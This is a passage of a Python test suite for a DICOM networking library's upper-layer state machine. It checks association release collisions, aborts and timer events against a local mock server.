#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt16']
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt17']
def test_evt18(self):
"""Test Sta8 + Evt18."""
# Sta8 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt18']
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', b'\x08\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt19']
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1), # no response
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('send', a_associate_rj),
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt3', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
